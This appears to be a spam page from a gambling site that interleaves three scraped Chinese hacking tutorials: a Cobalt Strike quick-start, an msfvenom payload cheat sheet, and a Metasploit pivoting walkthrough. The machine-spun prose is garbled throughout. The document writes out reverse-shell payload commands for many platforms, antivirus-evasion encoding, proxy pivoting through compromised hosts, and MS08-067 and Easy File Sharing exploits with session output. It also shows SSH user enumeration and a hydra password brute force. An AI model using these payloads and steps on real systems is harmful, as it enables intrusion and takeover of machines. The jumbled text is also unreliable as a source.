欢迎访问必赢官网公司网站!


互联网信息

MENU

当前位置 : 必赢官网 > 互联网信息 >
互联网信息

必赢官网多重转发渗透隐藏内网,快速上手

点击: 150 次  来源:http://www.imenparto.com 时间:2020-01-04

原标题:cobalt strike 急忙上手 [ 一 ]

转自:https://thief.one/2017/08/01/1/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io

0x01 关于 Cobalt Strike

今天玩了生龙活虎把内网渗透,其中主要接受了 metasploit 那款内网渗透神器。metasploit大家明确不素不相识,我也在很早此前就有接触过,但每便重复接纳它时都会遗忘一些用法,因而为了便利查询自个儿在本篇记录下metasploit神器的意气风发部分常用命令,以致内网渗透中怎样行使它。
Mac下安装metasploit
mac下安装metasploit比较容易,官方网址下载pkg安装包,直接设置就可以;需求注意的是设置到位后的路径。msfconsole路线:
1

必赢官网 1

生机勃勃款非常精美的后渗透平台 [ 何人用哪个人知道,嘿嘿……说不允许用的并世无两原因,恐怕即是无数用法还尚无被自身打井出来,因为不会用,所以,才会感到倒霉用 ]

/opt/metasploit-framework/bin

一、About

工具基于java,当先八分之四效应在改过的根底上依然相对比较实用的,非常切合团队间协同应战

该目录下还应该有此外多少个常用的工具:

内网机器如下:

越多实际情况请自行参照他事他说加以考查官方网址,这里就不啰嗦了,以下全体简单的称呼'cs'

必赢官网 2

必赢官网 3

0x02 功底情状简单介绍:

说明:

kali 实际调节端 ip:192.168.1.144

msf的插件路线:
1

1卡塔尔Attacker为攻击者,有三个网卡,网段为172.16.0.0,Attacker系统为kali系统

ubuntu 16.04 自身公网的vps ip:53.3.3.6

/opt/metasploit-framework/embedded/framework/modules/exploits

2卡塔尔国哈弗D为率先个曾经渗透的目的,有两块网卡,对应172.16.0.0和7.7.7.0多个网段

win二〇〇九兰德卡宴2 指标机器 ip:192.168.1.191

msfvenom
功效:生成木马文件,替代早期版本的msfpayload和msfencoder。
Options
msfvenom命令行选项如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

3卡塔尔(قطر‎JC有两块网卡,对应7.7.7.0和8.8.8.0多少个网段,JC有ms08-067和efs bof八个漏洞,可getshell

centos6.9 已控肉鸡 ip:192.168.1.199

-p, --payload <payload> 钦定要求运用的payload(攻击荷载卡塔尔(قطر‎
-l, --list [module_type] 列出钦命模块的保有可用能源,模块类型富含: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先钦赐三个NOP滑动长度
-f, --format <format> 钦点输出格式 (使用 --help-formats 来博取msf扶植的输出格式列表卡塔尔国
-e, --encoder [encoder] 内定要求利用的encoder(编码器)
-a, --arch <architecture> 钦命payload的对象构造
--platform <platform> 钦命payload的对象平台
-s, --space <length> 设定有效攻击荷载的最大尺寸
-b, --bad-chars <list> 设定逃避字符集,譬如: 'x00xff'
-i, --iterations <count> 钦定payload的编码次数
-c, --add-code <path> 内定一个增大的win32 shellcode文件
-x, --template <path> 钦命二个自定义的可施行文件作为模板
-k, --keep 珍重模板程序的动作,注入的payload作为叁个新的经过运转
--payload-options 列举payload的正经选项
-o, --out <path> 保存payload
-v, --var-name <name> 钦点叁个自定义的变量,以分明输出格式
--shellest 最小化生成payload
-h, --help 查看协理选拔
--help-formats 查看msf援救的出口格式列表

4卡塔尔SK有一块网卡,对应8.8.8.0网段,SK有vsftpd的露出马脚,可getshell

win7cn 另后生可畏台肉鸡 ip:192.168.1.123

options usage
查阅扶植的payload列表:
1

5State of Qatar起始Attacker只得到路虎极光D的msf的shell,对于指标内网意况目不识丁,也不精通存在7.7.7.0和8.8.8.0这三个暗藏的网段

0x03 先来神速预览cs最宗旨的后生可畏对模块具体用项:

msfvenom -l payloads

6卡塔尔国指标是希图通过本田CR-VD来渗透内网中7.7.7.0和8.8.8.0三个藏匿的网段

团队服务器[teamserver]

翻看扶持的出口文件类型:
1

二、Step1

关键是为了有扶持二个渗透团队内部可以立即分享全部成员的保有渗透音信,抓实成员间的交换同盟,以此抓实渗透成效

msfvenom --help-formats

Attacker在奥迪Q3D上通过webshell运转了多少个reverse类型的后门,然后操作如下:

也正是说,通常状态下三个团体只必要起一个组织服务器就可以,团队中的具有成员只必要拿着友好的cs用户端登入到组织服务器就能够轻轻巧松达成协同应战

翻花销持的编码格局:(为了到达免杀的机能卡塔尔
1

msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.0.20  LHOST => 172.16.0.20msf exploit(handler) > set LPORT 1234 LPORT => 1234msf exploit(handler) > run [*] Started reverse TCP handler on 172.16.0.20:1234  [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 172.16.0.11 [*] Meterpreter session 2 opened (172.16.0.20:1234 -> 172.16.0.11:49162)meterpreter > ifconfig Interface  1============ Name         : Software Loopback Interface 1Hardware MAC : 00:00:00:00:00:00MTU          : 4294967295IPv4 Address : 127.0.0.1IPv4 Netmask : 255.0.0.0IPv6 Address : ::1IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11============ Name         : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:e1:3f:af MTU          : 1500IPv4 Address : 172.16.0.11IPv4 Netmask : 255.255.255.0Interface 19============ Name         : Intel(R) PRO/1000 MT Desktop Adapter #2Hardware MAC : 08:00:27:7f:3c:fe MTU          : 1500IPv4 Address : 7.7.7.11IPv4 Netmask : 255.255.255.0 

本来,实际中可能为了尽量久的保持住目的机器权限,还也许会习于旧贯性的多开多少个组织服务器,防止出现意外情形

msfvenom -l encoders

三、Step2

别的,团体服务器最棒运营在linux平台上[此番演示所用的团组织服务器系统为ubuntu 16.04]

查看扶助的空字段模块:(为了达到免杀的法力卡塔尔(قطر‎
1

发觉PRADOD有两块网卡后,想艺术渗透另叁个网段7.7.7.0,首先要加多路由[不加多路由也能够直接用meterpreter shell中的模块访问到7.7.7.x网段,增加路由的目标是为着使得msf模块能够访谈到7.7.7.x网段],meterpreter shell能够访问到7.7.7.x网段,msf 中的模块无法访谈到7.7.7.x网段,msf中的模块所处的ip是攻击者的ip,meterpreter shell所处的ip是SportageD的ip.在meterpreter中 增多路由的目的是为了给msf模块作代理,也即给Attacker作代理,但是只可以给Attacker的msf模块作代理,要想给Attacker的别样 应用程序作代理,则须要在meterpreter增添路由后再运维msf的拉开sock4的模块,然后再用proxychains来设置Attacker的任何 应用程序的代办为msf的打开sock4代理模块中装置的代理进口。

# ./teamserver 团队服务器ip 设置一个集团服务器密码[人家要用这些密码才具连步入] 配置文件[近似暗许就能够] [YYYY-MM-DD]

msfvenom -l nops

操作如下:

# ./teamserver 53.3.3.6 klion

基础payload
命令格式
1

meterpreter > run autoroute -s 7.7.7.0/24[*] Adding a route to 7.7.7.0/255.255.255.0... [+] Added route to 7.7.7.0/255.255.255.0 via 172.16.0.11[*] Use the -p option to list all active routes meterpreter > run autoroute -p Active Routing Table ====================  Subnet Netmask Gateway  ------ ------- ------- 7.7.7.0 255.255.255.0 Session 2meterpreter > 

必赢官网 4

msfvenom -p <payload> <payload options> -f <format> -o <path>

然后初叶扫描7.7.7.0网段,操作如下:

客户端[cobaltstrike]

Linux
1
2
3
4

meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24[*] Running module against DISCORDIA [*] ARP Scanning 7.7.7.0/24[*]     IP: 7.7.7.11 MAC 08:00:27:7f:3c:fe (CADMUS COMPUTER SYSTEMS) [*]     IP  7.7.7.12 MAC 08:00:27:3a:b2:c1 (CADMUS CIMPUTER SYSTEMS) [*]     IP: 7.7.7.20 MAC 08:00:27:fa:a0:c5 (CADMUS COMPUTER SYSTEMS) [*]     IP: 7.7.7.255 MAC 08:00:27:3f:2a:b5 (CADMUS COMPUTER SYSTEMS) meterpreter > 

为了越来越好的认证效果与利益,此处就各自模拟五个分歧的客户端同时登入到同意气风发台团队服务器中,首先,先在本机运营客商端尝试登入到团队器,顾客端运营将来会提示您输入团队服务器的ip,端口和密码,顾客名可随机

反向连接:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
正向连接:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

arp_scanner不太够用,没办法扫到端口新闻[这时候也可用msf自带的别样能够扫描端口的模块如auxiliary/scanner/portscan/tcp来扫 描,因为后边增加了路由,使得msf中的模块可以用meterpreter作为代理访谈到7.7.7.x网段],于是用Attacker本机的nmap来扫[能够更完全的扫视,nmap应该比msf中的扫描模块强盛],首先在WranglerD上开sockets4代理,然后用proxychains设置nmap的代办为msf模块开 启的Attacker的1080端口提供的代理,操作如下:

# ./cobaltstrike

Windows
1

meterpreter > background  [*] Backgrounding session 2... msf > use auxiliary/server/socks4a  msf auxiliary(socks4a) > show options  Module options (auxiliary/server/socks4a):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    SRVHOST  0.0.0.0          yes       The address to listen on    SRVPORT  1080             yes       The port to listen on. Auxiliary action:    Name   Description    ----   -----------    Proxy   msf auxiliary(socks4a) > set srvhost 172.16.0.20 srvhost => 172.16.0.20msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > netstat -antp | grep 1080 [*] exec: netstat -antp | grep 1080 tcp        0      172.16.0.20:1080            0.0.0.0:*               LISTEN      3626/ruby        msf auxiliary(socks4a) > 

必赢官网 5

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

proxychains设置/etc/proxychains.conf如下:

随着,再到另黄金年代台kali机器上开拓客商端登入登陆到同一团队服务器,最终贯彻的功能如下,团队成员能够因此event互相沟通,也可通过event清晰看出团队中的其余成员在哪些日子都干了些什么,非常详细直观:

Mac
1
2

[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"#socks4  127.0.0.1 9050socks4  172.16.0.20 1080 

# ./cobaltstrike

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads

nmap扫描如下:

必赢官网 6

PHP
1
2

root@kali:~# proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 7.7.7.20ProxyChains-3.1 (http://proxychains.sf.net)Starting Nmap 7.25BETA1 ( https://nmap.org )|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK Nmap scan report for 7.7.7.20Host is up (0.17s latency). PORT     STATE    SERVICE      VERSION 22/tcp   open     ssh          Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0)80/tcp   closed   http         Easy File Sharing Web Server httpd 6.9 135/tcp  open     msrpc        Microsoft Windows RPC 139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn 445/tcp  open     microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 Host script results: | smb-vuln-ms08-067:  |   VULNERABLE: |   Microsoft Windows system vulnerable to remote code execution (MS08-067)|     State: VULNERABLE |     IDs: CVE:CVE-2008-4250 |          The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,  |          Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary  |          code via a crafted RPC request that triggers the overflow during path canonicalization. |  |     Disclosure date: 2008-10-23 |     References: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspxService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds root@kali:~# 

必赢官网 7

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php

明日发觉了7.7.7.20(JC卡塔尔那台机器端口开放超多,尝试搜索JC的狐狸尾巴,操作如下: 首先拜会JC的80端口运营了何等cms,可是Attacker的浏览器直接待上访谈 不在同一网段,此处有个要细心的剧情:

接纳cs的各类监听器

ASP
1

Attention:能够采纳采用proxychains设置Attacker的浏览器的代理为Attacker的1080端口的socks4代理进口,也可经过在哈弗D的meterpreter会 话中运作portfwd模块命令,portfwd命令如下:

实则,监听器的功用相当轻易,主固然为着担任payload回传的每一类数据,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20[*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80meterpreter > meterpreter > portfwd listActive Port Forwards ====================    Index  Local             Remote       Direction    -----  -----             ------       ---------   1      172.16.0.20:2323  7.7.7.20:80  Forward1 total active port forwards. meterpreter > 

比如说,大家的payload在指标机器实施今后,会回连到监听器然后下载实行真正的shellcode代码,其实跟msf中handler的效果为主是相仿的

JSP
1

通过拜候Attacker的2323端口访谈JC的80端口,结果如下:

在cs中的监听器有二种,风姿洒脱种是beacon,另黄金时代种是foreign

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

必赢官网 8

foreign 首假若提需求外界使用的生龙活虎部分监听器,譬如你想行使cs派生二个meterpreter的shell回来,来世襲前面包车型地铁内网渗透,这个时候就接收使用外界监听器

WAR
1
2

这里的portfwd模块不只是名字上的端口转载的意思,近期作者认为portfwd相当于半个ssh正向代理加一个ssh反向代理组成的回顾命令,ssh正向反向代理可参谋这里的理解。ssh正向反向代理驾驭小编感觉portfwd命令之后Attacker能够通过拜候Attacker本人ip的2323端口进而访问到JC的80端口时期爆发了3件事。

再来简单演示下,怎么样高效创制多个监听器,具体经过如下

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa
Scripting Payloads

1.昂CoraD走访JC的80端口,这里一定于半个ssh正向代理

点击左上角的Cobalt Strike菜单

Python
1

2.EnclaveD绑定已经采访到的JC的80端口的数码到Attacker的2323端口,这里一定于多少个ssh反向代理,相当于CRUISERD有Attacker的ssh权限

-> 选中Listeners

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

3.攻击者的浏览器访谈攻击者本人的172.16.0.20:2323

-> 接着点击Add开关会自动跳出监听器的配置框

Bash
1

portfwd的用法如下:

-> 设置好端口ip [ 实际中最佳用域名(走dns隧道卡塔尔 ]和payload类型就可以创造,之后,共青团和少先队服务器会一向监听该端口等待beacon shell回连的数目

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS:      -L >opt>  The local host to listen on (optional).      -h        Help banner.      -l >opt>  The local port to listen on.      -p >opt>  The remote port to connect on.      -r >opt>  The remote host to connect on. meterpreter > 

必赢官网 9

Perl
1

此中-L只可以设置为攻击者的ip,无法设置为肉鸡的ip,-L设置的ip能够是攻击者的内网ip,-r也足以是指标的内网ip,四个内网之 间通过meterpreter会话的"隧道"来连接,假如-L后安装的ip是攻击者的内网ip,-r后装置的是指标机器的内网ip,portfwd通过 meterpreter会话连通两台,-l是指攻击者的监听端口,运维完上面的portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20 命令后,Attacker的2323端口将成为监听状态(也即Attacker会开启2323端口卡塔尔这里还要注意route add命令只好是在meterpreter会话中央银立见成效,不能够系统全局有效,小编感到route add也是透过meterpreter会 话的"隧道"来促成攻击者能够访谈指标机器其余网段机器的,也即在地方的Attacker通过portfwd来兑现访问目的机器其余网段 机器而不可能因为在portfwd模块运维前由于已经运维了route add模块而由Attacker的浏览器直接待上访问指标7.7.7.20:80,因为 route add只会给msf的模块提供meterpreter会话通道作为代理服务,唯有meterpreter会话下可用的模块能够直接访谈7.7.7.x 网段,Attacker的浏览器想一直访问7.7.7.20急需运用proxychins和msf开启的sock4代理.

必赢官网 10

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

地点访谈获得指标机器JC的80端口音讯来看JC运转的是Eash File Sharing Web Server,可用msf中的模块尝试getshell,操作如 下(若无在meterpreter中增加路由msf是拜访不到7.7.7.20的卡塔尔国:

必赢官网 11

Linux Based Shellcode
1

msf  > use exploit/windows/http/easyfilesharing_seh  msf exploit(easyfilesharing_seh) > show options  Module options (exploit/windows/http/easyfilesharing_seh):    Name   Current Setting  Required  Description    ----   ---------------  --------  -----------    RHOST                   yes       The target address    RPORT  80               yes       The target port Exploit target:    Id  Name    --  ----    0   Easy File Sharing 7.2 HTTP msf exploit(easyfilesharing_seh) > set rhost 7.7.7.20 rhost => 7.7.7.20msf exploit(easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(easyfilesharing_seh) > run [*] Started bind handler [*] 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit... [+] 7.7.7.20:80 - Exploit Sent [*] Sending stage (957999 bytes) to 7.7.7.20 [*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) at 2016-12-26 14:21:11 +0300 

说罢监听器,最终,大家再来讲payload [攻击载荷]

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

抑或从JC(7.7.7.20卡塔尔22端口动手:

说白点儿其实就是个木马下载器,当目的触发payload未来,会自动去下载shellcode[其实就是beacon shell的代码]到指标种类中运作,最后成功弹回目的系列的beacon shell,

Windows Based Shellcode
1

msf > use auxiliary/scanner/ssh/ssh_enumusers  msf auxiliary(ssh_enumusers) > set rhosts 7.7.7.20rhosts => 7.7.7.20msf auxiliary(ssh_enumusers) > set rport 22rport => 22msf auxiliary(ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt msf auxiliary(ssh_enumusers) > run [*] 7.7.7.20:22 - SSH - Checking for false positives [*] 7.7.7.20:22 - SSH - Starting scan [+] 7.7.7.20:22 - SSH - User 'admin' found [-] 7.7.7.20:22 - SSH - User 'root' not found [-] 7.7.7.20:22 - SSH - User 'Administrator' not found [+] 7.7.7.20:22 - SSH - User 'sysadm' found [-] 7.7.7.20:22 - SSH - User 'tech' not found [-] 7.7.7.20:22 - SSH - User 'operator' not found [+] 7.7.7.20:22 - SSH - User 'guest' found [-] 7.7.7.20:22 - SSH - User 'security' not found [-] 7.7.7.20:22 - SSH - User 'debug' not found [+] 7.7.7.20:22 - SSH - User 'manager' found [-] 7.7.7.20:22 - SSH - User 'service' not found [-] 7.7.7.20:22 - SSH - User '!root' not found [+] 7.7.7.20:22 - SSH - User 'user' found [-] 7.7.7.20:22 - SSH - User 'netman' not found [+] 7.7.7.20:22 - SSH - User 'super' found [-] 7.7.7.20:22 - SSH - User 'diag' not found [+] 7.7.7.20:22 - SSH - User 'Cisco' found [-] 7.7.7.20:22 - SSH - User 'Manager' not found [+] 7.7.7.20:22 - SSH - User 'DTA' found [-] 7.7.7.20:22 - SSH - User 'apc' not found [+] 7.7.7.20:22 - SSH - User 'User' found [-] 7.7.7.20:22 - SSH - User 'Admin' not found [+] 7.7.7.20:22 - SSH - User 'cablecom' found [-] 7.7.7.20:22 - SSH - User 'adm' not found [+] 7.7.7.20:22 - SSH - User 'wradmin' found [-] 7.7.7.20:22 - SSH - User 'netscreen' not found [+] 7.7.7.20:22 - SSH - User 'sa' found [-] 7.7.7.20:22 - SSH - User 'setup' not found [+] 7.7.7.20:22 - SSH - User 'cmaker' found [-] 7.7.7.20:22 - SSH - User 'enable' not found [+] 7.7.7.20:22 - SSH - User 'MICRO' found [-] 7.7.7.20:22 - SSH - User 'login' not found [*] Caught interrupt from the console... [*] Auxiliary module execution completed ^C msf auxiliary(ssh_enumusers) > 

有关在beacon shell实践的命令都以安分守纪安顿职责来的,也正是说被控端会按事情未发生前分明好的岁月自动去调整端下载各个吩咐义务逐大器晚成在指标种类中施行

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

然后用hydra当地用msf模块开启的1080端口的sock4代理尝试爆破:

率先,大家先来大致创立个payload,然后间接把它丢到对象类别中推行,看看实际的上线效果到底是个怎样样子,注意,这里带红爪子的是早已拿到系统最高权力的,没爪子的着力都以系统权限一时还非常低的

Mac Based Shellcode
1
2

root@kali:~# proxychains hydra 7.7.7.20 ssh -s 22 -L /tmp/user.txt -P top100.txt -t 4 ProxyChains-3.1 (http://proxychains.sf.net) Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting  [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 4 tasks per 1 server, overall 64 tasks, 20 login tries (l:2/p:10), ~0 tries per task [DATA] attacking service ssh on port 22 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK<><>-OK<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK [22][ssh] host: 7.7.7.20   login: admin   password: 123456 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished root@kali:~# 

必赢官网 12

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers

开采成可用帐户密码admin:123456,然后再用sock4代理ssh登陆:

必赢官网 13

payload加编码
一声令下格式:
1

root@kali:~# proxychains ssh admin@7.7.7.20 ProxyChains-3.1 (http://proxychains.sf.net) |D-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK The authenticity of host '7.7.7.20 (7.7.7.20)' can't be established. ECDSA key fingerprint is SHA256:Rcz2KrPF3BTo16Ng1kET91ycbr9c8vOkZcZ6b4VawMQ. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '7.7.7.20' (ECDSA) to the list of known hosts. admin@7.7.7.20's password:  bvshell:/C/Documents and Settings/All Users$ pwd /C/Documents and Settings/All Users bvshell:/C/Documents and Settings/All Users$ dir 2016-12-24  21:32          <DIR> Application Data 2016-12-25  06:16          <DIR> Desktop 2016-12-24  18:36          <DIR> Documents 2016-12-24  18:37          <DIR> DRM 2016-12-24  21:32          <DIR> Favorites 2016-12-24  18:38          <DIR> Start Menu 2016-12-24  21:32          <DIR> Templates       0 Files                  0 bytes       7 Directories bvshell:/C/Documents and Settings/All Users$ 

必赢官网 14

msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

或者用ms08067:

必赢官网 15

常用编码:
1
2

msf > use exploit/windows/smb/ms08_067_netapi  msf exploit(ms08_067_netapi) > show options  Module options (exploit/windows/smb/ms08_067_netapi):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       The SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) Exploit target:    Id  Name    --  ----   0   Automatic Targeting msf exploit(ms08_067_netapi) > set rhost 7.7.7.20rhost => 7.7.7.20msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options  Module options (exploit/windows/smb/ms08_067_netapi):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST    7.7.7.20         yes       The target address    RPORT    445              yes       The SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/bind_tcp):    Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)    LPORT     4444             yes       The listen port    RHOST     7.7.7.20         no        The target address Exploit target:    Id  Name    --  ----   0   Automatic Targeting msf exploit(ms08_067_netapi) > run [*] Started bind handler [*] 7.7.7.20:445 - Automatically detecting the target... [*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown [*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English [*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX) [*] 7.7.7.20:445 - Attempting to trigger the vulnerability... [*] Sending stage (957999 bytes) to 7.7.7.20[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444)  meterpreter > 

0x04 丰硕的客商端攻击选项

x86/shikata_ga_nai
cmd/powershell_base64

成家立业溢出getshell后翻看JC(7.7.7.20卡塔尔网卡新闻:

首先,尝试使用 ‘System Profiler’ 模块,搜集指标的每一类机械和工具消息,举例,指标用的怎么版本的操作系统,什么浏览器,详细版本是微微,有未有装flash,flash具体版本又是有一点点[低版本能够挂马],看能还是不可能看见目的内网ip段,大概目测忖度下目的内网有多大,有了这么些底蕴音讯之后,中期我们就可以针没错上书发信,依旧那句话,实际中最棒用域名,因为那边是实验所以才直接用的ip,发信时最佳用html伪装个比较”到位”的链接,关于写信发信又是另贰个相比较’职业’的本事点,个人本事轻松,这里暂不涉及,嘿嘿……上面就给我们轻巧的看下实际的作用

例子:
1

meterpreter > ipconfigInterface  1============Name         : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU          : 1520IPv4 Address : 127.0.0.1Interface 65539============Name         : Intel(R) PRO/1000 MT Desktop AdapterHardware MAC : 08:00:27:29:cd:cbMTU          : 1500IPv4 Address : 8.8.8.3IPv4 Netmask : 255.255.255.0Interface 65540============Name         : Intel(R) PRO/1000 MT Desktop Adapter #2Hardware MAC : 08:00:27:e3:47:43MTU          : 1500IPv4 Address : 7.7.7.20IPv4 Netmask : 255.255.255.0meterpreter > 

必赢官网 16

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 -f exe > 1.exe

意识又现身二个8.8.8.x的网段,于是将这几个网段增多路由,以便msf中的模块能够访谈到8.8.8.x网段.

必赢官网 17

自行选购模块
变迁执行总计器payload例子:
1

四、Step3

必赢官网 18

msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

先直接用新的meterpreter shell看看8.8.8.x这几个网段有啥机器

动用’hta payload’合作’文件下载’模块向目的发送种种钓鱼链接,首先,成立二个hta的payload,这里的payload暂且只帮助三种可实践格式,exe,powershell和vba(宏卡塔尔国,实际中更推荐用powershell,成功率相对较高,好处就比较少说了,免杀,灵活…

payload的坑
正规景况下,利用msfvenom生成的木Marvin件,可径直上传到对象服务器上运营(加权限)。但本身本人遭遇过二个坑,生成的文件内容有局地是没用的,会挑起报错,如下图所示。

meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24[*] Running module against SRV03[*] ARP Scanning 8.8.8.0/24[*]   IP: 8.8.8.3 MAC 08:00:27:29:cd:cb (CADMUS COMPUTER SYSTEMS)[*]   IP: 8.8.8.1 MAC 0a:00:27:00:00:03 (UNKNOWN)[*]   IP: 8.8.8.9 MAC 08:00:27:56:f1:7c (CADMUS COMPUTER SYSTEMS)[*]    IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS) 

必赢官网 19

为了让msf中持有模块都能访谈到8.8.8.x网段,在新的meterpreter会话中增多路由:

必赢官网 20

meterpreter > run autoroute -s 8.8.8.0/24[*] Adding a route to 8.8.8.0/255.255.255.0...[+] Added route to 8.8.8.0/255.255.255.0 via 7.7.7.20[*] Use the -p option to list all active routes 

必赢官网 21

为了让Attacker的不外乎msf模块以外的任何应用程序能访谈到8.8.8.x网段,再使用msf的展开sock4代理的模块开启其余三个端口 作为8.8.8.x网段的进口:

必赢官网 22

必赢官网 23

